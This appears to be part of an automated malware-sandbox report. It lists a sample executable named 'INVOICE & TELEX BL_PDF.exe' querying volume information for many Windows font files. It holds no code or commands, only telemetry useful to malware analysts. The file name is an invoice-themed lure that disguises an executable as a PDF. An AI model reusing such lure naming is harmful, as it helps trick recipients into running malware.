                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
